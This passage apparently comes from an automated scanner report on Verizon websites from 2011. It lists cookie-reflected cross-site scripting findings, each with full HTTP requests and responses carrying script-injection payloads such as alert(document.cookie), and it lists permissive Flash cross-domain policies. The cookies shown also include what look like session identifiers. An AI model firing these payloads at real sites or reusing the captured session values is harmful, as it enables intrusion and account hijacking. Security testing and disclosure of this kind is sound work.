Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=l&rv=l&q=xss&search.x=0&search.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=92222<script>alert(1)</script>b03d1d885ac; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:13 GMT
Server: Atomz/1.0
Set-Cookie: vsrecentsearches=wss~92222%3cscript%3ealert(1)%3c/script%3eb03d1d885ac~~~; domain=.verizon.com; path=/; expires=Sun, 04-Dec-2011 22:19:13 GMT
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 70437

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
92222<script>alert(1)</script>b03d1d885ac
...[SNIP]...

2.38. http://www22.verizon.com/residentialhelp/fiostv [ECSPCookies cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/fiostv

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload b7216<script>alert(1)</script>473797c7535 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/fiostv HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=b7216<script>alert(1)</script>473797c7535; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239446
Expires: Mon, 05 Sep 2011 22:25:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:49 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=b7216<script>alert(1)</script>473797c7535; expires=Wed, 05-Sep-2012 22:25:49 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:25:48 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=b7216<script>alert(1)</script>473797c7535; expires=Wed, 05-Sep-2012 22:25:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
<HEAD id="ctl00_head"><title>
Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
</strong> b7216<script>alert(1)</script>473797c7535</span>
...[SNIP]...

2.39. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload ed395<script>alert(1)</script>fb3c84c9c0a was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39ed395<script>alert(1)</script>fb3c84c9c0a; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230585
Expires: Mon, 05 Sep 2011 22:41:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:54 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39ed395<script>alert(1)</script>fb3c84c9c0a; expires=Wed, 05-Sep-2012 22:41:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
<HEAD id="ctl00_head"><title>
Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...
</script>af81f92fd39ed395<script>alert(1)</script>fb3c84c9c0a</span>
...[SNIP]...

2.40. http://www22.verizon.com/residentialhelp/phone [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/phone

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8c87a<script>alert(1)</script>bdc568c71ed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=100108c87a<script>alert(1)</script>bdc568c71ed; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230626
Expires: Mon, 05 Sep 2011 22:41:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:52 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89; expires=Wed, 05-Sep-2012 22:41:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
<HEAD id="ctl00_head"><title>
Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...
</strong>, 100108c87a<script>alert(1)</script>bdc568c71ed</span>
...[SNIP]...

3. Flash cross-domain policy previous next
There are 14 instances of this issue:

http://ehg-verizon.hitbox.com/crossdomain.xml
http://g-pixel.invitemedia.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://pixel.mathtag.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://s.xp1.ru4.com/crossdomain.xml
http://segment-pixel.invitemedia.com/crossdomain.xml
http://servedby.flashtalking.com/crossdomain.xml
http://statse.webtrendslive.com/crossdomain.xml
http://verizonwireless.tt.omtrdc.net/crossdomain.xml
http://cache.vzw.com/crossdomain.xml
http://www.verizonwireless.com/crossdomain.xml
http://www22.verizon.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://ehg-verizon.hitbox.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:51 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 05 Sep 2011 23:13:51 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.2. http://g-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:42 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.3. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 05 Sep 2011 22:14:39 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.4. http://pixel.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0x5008 20488
Set-Cookie: ts=1315260880; domain=.mathtag.com; path=/; expires=Tue, 04-Sep-2012 22:14:40 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.5. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 06 Sep 2011 22:14:38 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.6. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 05 Sep 2011 22:14:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 05 Sep 2011 22:14:37 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.7. http://s.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:31 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:30 GMT
Content-length: 202
Etag: "ca-4ceae16e"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.8. http://segment-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:39 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.9. http://servedby.flashtalking.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Mon, 05 Sep 2011 22:13:27 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 540

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://statse.webtrendslive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:13:37 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.11. http://verizonwireless.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://verizonwireless.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: verizonwireless.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Mon, 05 Sep 2011 22:14:33 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
